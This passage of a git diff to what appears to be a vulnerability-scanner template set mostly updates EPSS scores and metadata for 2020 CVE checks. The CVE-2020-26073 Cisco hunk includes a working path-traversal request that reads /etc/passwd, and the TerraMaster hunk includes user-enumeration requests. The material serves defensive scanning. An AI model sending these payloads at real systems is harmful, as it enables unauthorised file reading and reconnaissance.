@@ -15,8 +15,9 @@ info:
cvss-score: 10
cve-id: CVE-2020-24186
cwe-id: CWE-434
- epss-score: 0.97446
+ epss-score: 0.97466
cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99936
metadata:
max-request: 2
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml
index 2e9b0d2757..65b637d45e 100644
--- a/http/cves/2020/CVE-2020-24223.yaml
+++ b/http/cves/2020/CVE-2020-24223.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00976
cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:*
+ epss-percentile: 0.81474
metadata:
max-request: 1
vendor: mara_cms_project
diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml
index 5dde1284ee..9817359823 100644
--- a/http/cves/2020/CVE-2020-24312.yaml
+++ b/http/cves/2020/CVE-2020-24312.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-24312
cwe-id: CWE-552
- epss-score: 0.02033
+ epss-score: 0.01899
cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87035
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml
index 40ce478a1f..183cdee90f 100644
--- a/http/cves/2020/CVE-2020-24391.yaml
+++ b/http/cves/2020/CVE-2020-24391.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-24391
- epss-score: 0.48236
+ epss-score: 0.49786
cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:*
+ epss-percentile: 0.9707
metadata:
max-request: 3
framework: node.js
diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml
index 4884a2309a..29a8e4466f 100644
--- a/http/cves/2020/CVE-2020-24550.yaml
+++ b/http/cves/2020/CVE-2020-24550.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00157
cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:*
+ epss-percentile: 0.5154
metadata:
max-request: 1
vendor: episerver
diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml
index 18be48982a..8d2a76e4e8 100644
--- a/http/cves/2020/CVE-2020-24571.yaml
+++ b/http/cves/2020/CVE-2020-24571.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02885
cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89445
metadata:
max-request: 1
vendor: nexusdb
diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml
index 11426fb13d..1f0c57b928 100644
--- a/http/cves/2020/CVE-2020-24579.yaml
+++ b/http/cves/2020/CVE-2020-24579.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2020-24579
cwe-id: CWE-287
- epss-score: 0.00642
+ epss-score: 0.00455
cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72083
metadata:
max-request: 2
vendor: dlink
diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml
index 5336c2ad97..d2bc49193b 100644
--- a/http/cves/2020/CVE-2020-24589.yaml
+++ b/http/cves/2020/CVE-2020-24589.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 9.1
cve-id: CVE-2020-24589
cwe-id: CWE-611
- epss-score: 0.55262
+ epss-score: 0.57189
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97253
metadata:
max-request: 1
vendor: wso2
diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml
index c2569a13b5..c95365d9e5 100644
--- a/http/cves/2020/CVE-2020-24902.yaml
+++ b/http/cves/2020/CVE-2020-24902.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-24902
cwe-id: CWE-79
- epss-score: 0.00171
+ epss-score: 0.00179
cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.54405
metadata:
max-request: 1
google-query: intitle:"My Download Server"
diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml
index b55b207bdc..ed1b27ad39 100644
--- a/http/cves/2020/CVE-2020-24903.yaml
+++ b/http/cves/2020/CVE-2020-24903.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00246
cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:*
+ epss-percentile: 0.61852
metadata:
max-request: 1
shodan-query: http.component:"ASP.NET"
diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml
index f3c9ff5e48..529b1b430c 100644
--- a/http/cves/2020/CVE-2020-24912.yaml
+++ b/http/cves/2020/CVE-2020-24912.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00187
cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:*
+ epss-percentile: 0.55307
metadata:
max-request: 3
vendor: qcubed
diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml
index c306a273d1..4cf69856ed 100644
--- a/http/cves/2020/CVE-2020-24949.yaml
+++ b/http/cves/2020/CVE-2020-24949.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-77
epss-score: 0.96607
cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:*
+ epss-percentile: 0.99452
metadata:
max-request: 1
vendor: php-fusion
diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml
index 642eb77ca6..dfbfe11ae7 100644
--- a/http/cves/2020/CVE-2020-25078.yaml
+++ b/http/cves/2020/CVE-2020-25078.yaml
@@ -15,6 +15,7 @@ info:
cve-id: CVE-2020-25078
epss-score: 0.96829
cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99549
metadata:
max-request: 1
vendor: dlink
diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml
index c6de6f2eee..07cababd07 100644
--- a/http/cves/2020/CVE-2020-25213.yaml
+++ b/http/cves/2020/CVE-2020-25213.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-25213
cwe-id: CWE-434
- epss-score: 0.9739
+ epss-score: 0.97341
cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.99825
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml
index a6339d368d..46200c7a10 100644
--- a/http/cves/2020/CVE-2020-25223.yaml
+++ b/http/cves/2020/CVE-2020-25223.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-25223
cwe-id: CWE-78
- epss-score: 0.97526
+ epss-score: 0.97519
cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99975
metadata:
max-request: 1
vendor: sophos
diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml
index b7cd395530..115cc72d05 100644
--- a/http/cves/2020/CVE-2020-25495.yaml
+++ b/http/cves/2020/CVE-2020-25495.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00153
cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:*
+ epss-percentile: 0.50958
metadata:
max-request: 1
vendor: xinuos
diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml
index 359e63fa98..253a0f9438 100644
--- a/http/cves/2020/CVE-2020-25506.yaml
+++ b/http/cves/2020/CVE-2020-25506.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97451
cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*
+ epss-percentile: 0.99921
metadata:
max-request: 2
vendor: dlink
diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml
index 1178ef1a59..ecf0a22ece 100644
--- a/http/cves/2020/CVE-2020-2551.yaml
+++ b/http/cves/2020/CVE-2020-2551.yaml
@@ -16,6 +16,7 @@ info:
cve-id: CVE-2020-2551
epss-score: 0.97468
cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99939
metadata:
max-request: 1
vendor: oracle
diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml
index 75237d4018..7d34ba0cab 100644
--- a/http/cves/2020/CVE-2020-25540.yaml
+++ b/http/cves/2020/CVE-2020-25540.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-25540
cwe-id: CWE-22
- epss-score: 0.96525
+ epss-score: 0.96418
cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99372
metadata:
max-request: 1
vendor: ctolog
diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml
index fd1d78a082..f218afdebf 100644
--- a/http/cves/2020/CVE-2020-25780.yaml
+++ b/http/cves/2020/CVE-2020-25780.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01865
cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:*
+ epss-percentile: 0.869
metadata:
max-request: 1
vendor: commvault
diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml
index 1c000c4bc5..2d31489d6e 100644
--- a/http/cves/2020/CVE-2020-25864.yaml
+++ b/http/cves/2020/CVE-2020-25864.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00255
cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*
+ epss-percentile: 0.62621
metadata:
max-request: 2
vendor: hashicorp
diff --git a/http/cves/2020/CVE-2020-26073.yaml b/http/cves/2020/CVE-2020-26073.yaml
index 4d3c5a95f7..2b568939da 100644
--- a/http/cves/2020/CVE-2020-26073.yaml
+++ b/http/cves/2020/CVE-2020-26073.yaml
@@ -11,19 +11,21 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
classification:
cve-id: CVE-2020-26073
- tags: cve,cve2020,cisco,lfi
metadata:
max-request: 1
+ tags: cve,cve2020,cisco,lfi
http:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: regex
regex:
- "root:.*:0:0:"
diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml
index f8cabdf4d4..218fc17c5f 100644
--- a/http/cves/2020/CVE-2020-26153.yaml
+++ b/http/cves/2020/CVE-2020-26153.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00127
cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.46567
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-26214.yaml b/http/cves/2020/CVE-2020-26214.yaml
index b096037fe3..78b8c8a1af 100644
--- a/http/cves/2020/CVE-2020-26214.yaml
+++ b/http/cves/2020/CVE-2020-26214.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-26214
cwe-id: CWE-287
- epss-score: 0.01365
+ epss-score: 0.01258
cpe: cpe:2.3:a:alerta_project:alerta:*:*:*:*:*:*:*:*
+ epss-percentile: 0.83887
metadata:
max-request: 1
vendor: alerta_project
diff --git a/http/cves/2020/CVE-2020-26217.yaml b/http/cves/2020/CVE-2020-26217.yaml
index cb4acd7b2f..ff2ededbd1 100644
--- a/http/cves/2020/CVE-2020-26217.yaml
+++ b/http/cves/2020/CVE-2020-26217.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-78
epss-score: 0.97456
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99927
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2020/CVE-2020-26248.yaml b/http/cves/2020/CVE-2020-26248.yaml
index 1744f058f9..bf3f093b03 100644
--- a/http/cves/2020/CVE-2020-26248.yaml
+++ b/http/cves/2020/CVE-2020-26248.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
- epss-score: 0.01488
+ epss-score: 0.01502
cpe: cpe:2.3:a:prestashop:productcomments:*:*:*:*:*:prestashop:*:*
+ epss-percentile: 0.85288
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-26258.yaml b/http/cves/2020/CVE-2020-26258.yaml
index 3b55b213b5..e2c39932a4 100644
--- a/http/cves/2020/CVE-2020-26258.yaml
+++ b/http/cves/2020/CVE-2020-26258.yaml
@@ -20,6 +20,7 @@ info:
cwe-id: CWE-918
epss-score: 0.93377
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
+ epss-percentile: 0.98715
metadata:
max-request: 1
vendor: xstream_project
diff --git a/http/cves/2020/CVE-2020-26413.yaml b/http/cves/2020/CVE-2020-26413.yaml
index 11ef5209b4..86468f2e84 100644
--- a/http/cves/2020/CVE-2020-26413.yaml
+++ b/http/cves/2020/CVE-2020-26413.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-26413
cwe-id: CWE-200
- epss-score: 0.64648
+ epss-score: 0.65771
cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*
+ epss-percentile: 0.97457
metadata:
max-request: 1
shodan-query: http.title:"GitLab"
diff --git a/http/cves/2020/CVE-2020-26876.yaml b/http/cves/2020/CVE-2020-26876.yaml
index 700221c04f..4aaecdcf7f 100644
--- a/http/cves/2020/CVE-2020-26876.yaml
+++ b/http/cves/2020/CVE-2020-26876.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.01156
cpe: cpe:2.3:a:wpcoursesplugin:wp-courses:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.83081
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-26919.yaml b/http/cves/2020/CVE-2020-26919.yaml
index 13fce36c42..6062109e02 100644
--- a/http/cves/2020/CVE-2020-26919.yaml
+++ b/http/cves/2020/CVE-2020-26919.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-26919
- epss-score: 0.97428
+ epss-score: 0.97414
cpe: cpe:2.3:o:netgear:jgs516pe_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99885
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2020/CVE-2020-26948.yaml b/http/cves/2020/CVE-2020-26948.yaml
index 32212767b8..e8b2a9cc0a 100644
--- a/http/cves/2020/CVE-2020-26948.yaml
+++ b/http/cves/2020/CVE-2020-26948.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-26948
cwe-id: CWE-918
- epss-score: 0.04143
+ epss-score: 0.06357
cpe: cpe:2.3:a:emby:emby:*:*:*:*:*:*:*:*
+ epss-percentile: 0.92728
metadata:
max-request: 1
vendor: emby
diff --git a/http/cves/2020/CVE-2020-27191.yaml b/http/cves/2020/CVE-2020-27191.yaml
index d458c14c45..c0c0f0e479 100644
--- a/http/cves/2020/CVE-2020-27191.yaml
+++ b/http/cves/2020/CVE-2020-27191.yaml
@@ -14,8 +14,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-27191
cwe-id: CWE-22
- epss-score: 0.00632
+ epss-score: 0.00698
cpe: cpe:2.3:a:lionwiki:lionwiki:*:*:*:*:*:*:*:*
+ epss-percentile: 0.77767
metadata:
max-request: 1
vendor: lionwiki
diff --git a/http/cves/2020/CVE-2020-2733.yaml b/http/cves/2020/CVE-2020-2733.yaml
index 7bc228cf0e..796359522f 100644
--- a/http/cves/2020/CVE-2020-2733.yaml
+++ b/http/cves/2020/CVE-2020-2733.yaml
@@ -14,8 +14,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-2733
- epss-score: 0.1375
+ epss-score: 0.26869
cpe: cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*
+ epss-percentile: 0.96147
metadata:
max-request: 1
shodan-query: port:8999 product:"Oracle WebLogic Server"
diff --git a/http/cves/2020/CVE-2020-27361.yaml b/http/cves/2020/CVE-2020-27361.yaml
index 7c1851a0a4..24cc9cebee 100644
--- a/http/cves/2020/CVE-2020-27361.yaml
+++ b/http/cves/2020/CVE-2020-27361.yaml
@@ -14,6 +14,7 @@ info:
cwe-id: CWE-668
epss-score: 0.02936
cpe: cpe:2.3:a:akkadianlabs:akkadian_provisioning_manager:4.50.02:*:*:*:*:*:*:*
+ epss-percentile: 0.89526
metadata:
max-request: 1
vendor: akkadianlabs
diff --git a/http/cves/2020/CVE-2020-27467.yaml b/http/cves/2020/CVE-2020-27467.yaml
index 29162b61f7..1b100e7a83 100644
--- a/http/cves/2020/CVE-2020-27467.yaml
+++ b/http/cves/2020/CVE-2020-27467.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2020-27467
cwe-id: CWE-22
- epss-score: 0.00378
+ epss-score: 0.00459
cpe: cpe:2.3:a:processwire:processwire:*:*:*:*:*:*:*:*
+ epss-percentile: 0.72208
metadata:
max-request: 1
vendor: processwire
diff --git a/http/cves/2020/CVE-2020-27481.yaml b/http/cves/2020/CVE-2020-27481.yaml
index 0bf6b9376f..29621266a7 100644
--- a/http/cves/2020/CVE-2020-27481.yaml
+++ b/http/cves/2020/CVE-2020-27481.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-27481
cwe-id: CWE-89
- epss-score: 0.1745
+ epss-score: 0.12044
cpe: cpe:2.3:a:goodlayers:good_learning_management_system:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94623
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-27735.yaml b/http/cves/2020/CVE-2020-27735.yaml
index 79d08426b8..0bb91a1c14 100644
--- a/http/cves/2020/CVE-2020-27735.yaml
+++ b/http/cves/2020/CVE-2020-27735.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-27735
cwe-id: CWE-79
- epss-score: 0.00179
+ epss-score: 0.00217
cpe: cpe:2.3:a:wftpserver:wing_ftp_server:6.4.4:*:*:*:*:*:*:*
+ epss-percentile: 0.59
metadata:
max-request: 1
vendor: wftpserver
diff --git a/http/cves/2020/CVE-2020-27866.yaml b/http/cves/2020/CVE-2020-27866.yaml
index 687a3394eb..8c24851764 100644
--- a/http/cves/2020/CVE-2020-27866.yaml
+++ b/http/cves/2020/CVE-2020-27866.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-288,CWE-287
epss-score: 0.00365
cpe: cpe:2.3:o:netgear:ac2100_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.68896
metadata:
max-request: 1
vendor: netgear
diff --git a/http/cves/2020/CVE-2020-27982.yaml b/http/cves/2020/CVE-2020-27982.yaml
index f8b813a318..d4a8d238d5 100644
--- a/http/cves/2020/CVE-2020-27982.yaml
+++ b/http/cves/2020/CVE-2020-27982.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-27982
cwe-id: CWE-79
- epss-score: 0.00167
+ epss-score: 0.00178
cpe: cpe:2.3:a:icewarp:mail_server:11.4.5:*:*:*:*:*:*:*
+ epss-percentile: 0.54259
metadata:
max-request: 1
shodan-query: title:"icewarp"
diff --git a/http/cves/2020/CVE-2020-27986.yaml b/http/cves/2020/CVE-2020-27986.yaml
index 65bbc3cede..5f527d083f 100644
--- a/http/cves/2020/CVE-2020-27986.yaml
+++ b/http/cves/2020/CVE-2020-27986.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-306
epss-score: 0.1352
cpe: cpe:2.3:a:sonarsource:sonarqube:8.4.2.36762:*:*:*:*:*:*:*
+ epss-percentile: 0.94881
metadata:
max-request: 1
vendor: sonarsource
diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index ec425f727d..ad40647908 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -10,10 +10,20 @@ info:
- https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-28185
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+ - https://www.terra-master.com/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2020-28185
+ epss-score: 0.00406
+ cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.70469
metadata:
fofa-query: '"TerraMaster" && header="TOS"'
max-request: 2
verified: true
+ vendor: terra-master
+ product: tos
tags: cve,cve2020,terramaster,enum,tos
http:
@@ -21,7 +31,6 @@ http:
- |
GET /tos/index.php?user/login HTTP/1.1
Host: {{Hostname}}
-
- |
POST /wizard/initialise.php HTTP/1.1
Host: {{Hostname}}
@@ -33,6 +42,7 @@ http:
tab=checkuser&username=admin
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2020/CVE-2020-28188.yaml b/http/cves/2020/CVE-2020-28188.yaml
index c6587b0d51..54613ff4ce 100644
--- a/http/cves/2020/CVE-2020-28188.yaml
+++ b/http/cves/2020/CVE-2020-28188.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-28188
cwe-id: CWE-78
- epss-score: 0.97235
+ epss-score: 0.97282
cpe: cpe:2.3:o:terra-master:tos:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99781
metadata:
max-request: 2
vendor: terra-master
diff --git a/http/cves/2020/CVE-2020-28208.yaml b/http/cves/2020/CVE-2020-28208.yaml
index 68054c1ac0..106dbcda32 100644
--- a/http/cves/2020/CVE-2020-28208.yaml
+++ b/http/cves/2020/CVE-2020-28208.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-28208
cwe-id: CWE-203
- epss-score: 0.00603
+ epss-score: 0.00847
cpe: cpe:2.3:a:rocket.chat:rocket.chat:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80027
metadata:
max-request: 1
vendor: rocket.chat
diff --git a/http/cves/2020/CVE-2020-28351.yaml b/http/cves/2020/CVE-2020-28351.yaml
index ef27c1dbc1..a6ee8b49e2 100644
--- a/http/cves/2020/CVE-2020-28351.yaml
+++ b/http/cves/2020/CVE-2020-28351.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-28351
cwe-id: CWE-79
- epss-score: 0.00314
+ epss-score: 0.0036
cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:*
+ epss-percentile: 0.68696
metadata:
max-request: 1
vendor: mitel
diff --git a/http/cves/2020/CVE-2020-28871.yaml b/http/cves/2020/CVE-2020-28871.yaml
index 2e7fb0d4cc..5a2776f594 100644
--- a/http/cves/2020/CVE-2020-28871.yaml
+++ b/http/cves/2020/CVE-2020-28871.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-28871
cwe-id: CWE-434
- epss-score: 0.96694
+ epss-score: 0.96633
cpe: cpe:2.3:a:monitorr_project:monitorr:1.7.6m:*:*:*:*:*:*:*
+ epss-percentile: 0.99468
metadata:
max-request: 2
vendor: monitorr_project
diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml
index 5b9d534f88..ef0ff9dff5 100644
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-28976
cwe-id: CWE-918
- epss-score: 0.00452
+ epss-score: 0.00616
cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.76102
metadata:
max-request: 3
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-29164.yaml b/http/cves/2020/CVE-2020-29164.yaml
index f59e74ba1b..173b04431e 100644
--- a/http/cves/2020/CVE-2020-29164.yaml
+++ b/http/cves/2020/CVE-2020-29164.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00159
cpe: cpe:2.3:a:rainbowfishsoftware:pacsone_server:*:*:*:*:*:*:*:*
+ epss-percentile: 0.51802
metadata:
max-request: 1
vendor: rainbowfishsoftware
diff --git a/http/cves/2020/CVE-2020-29227.yaml b/http/cves/2020/CVE-2020-29227.yaml
index f6fea46912..933a1586fe 100644
--- a/http/cves/2020/CVE-2020-29227.yaml
+++ b/http/cves/2020/CVE-2020-29227.yaml
@@ -13,8 +13,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29227
- epss-score: 0.00544
+ epss-score: 0.00834
cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.79881
metadata:
max-request: 1
vendor: car_rental_management_system_project
diff --git a/http/cves/2020/CVE-2020-29284.yaml b/http/cves/2020/CVE-2020-29284.yaml
index 22a88089ae..fccd5c8ac6 100644
--- a/http/cves/2020/CVE-2020-29284.yaml
+++ b/http/cves/2020/CVE-2020-29284.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
- epss-score: 0.05055
+ epss-score: 0.04855
cpe: cpe:2.3:a:multi_restaurant_table_reservation_system_project:multi_restaurant_table_reservation_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.91729
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2020/CVE-2020-29395.yaml b/http/cves/2020/CVE-2020-29395.yaml
index ce62bdb148..efeee50ee7 100644
--- a/http/cves/2020/CVE-2020-29395.yaml
+++ b/http/cves/2020/CVE-2020-29395.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2020-29395
cwe-id: CWE-79
- epss-score: 0.03749
+ epss-score: 0.05489
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.92226
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2020/CVE-2020-29453.yaml b/http/cves/2020/CVE-2020-29453.yaml
index 142e6cda98..9dd1cdb2ba 100644
--- a/http/cves/2020/CVE-2020-29453.yaml
+++ b/http/cves/2020/CVE-2020-29453.yaml
@@ -15,6 +15,7 @@ info:
cwe-id: CWE-22
epss-score: 0.0129
cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
+ epss-percentile: 0.84109
metadata:
max-request: 2
shodan-query: http.component:"Atlassian Jira"
diff --git a/http/cves/2020/CVE-2020-29583.yaml b/http/cves/2020/CVE-2020-29583.yaml
index a80efb85e7..3bb4131a60 100644
--- a/http/cves/2020/CVE-2020-29583.yaml
+++ b/http/cves/2020/CVE-2020-29583.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-29583
cwe-id: CWE-522
- epss-score: 0.95315
+ epss-score: 0.95089
cpe: cpe:2.3:o:zyxel:usg20-vpn_firmware:4.60:*:*:*:*:*:*:*
+ epss-percentile: 0.99017
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2020/CVE-2020-29597.yaml b/http/cves/2020/CVE-2020-29597.yaml
index 39ecd7624c..caf611f4b1 100644
--- a/http/cves/2020/CVE-2020-29597.yaml
+++ b/http/cves/2020/CVE-2020-29597.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
- epss-score: 0.83522
+ epss-score: 0.83723
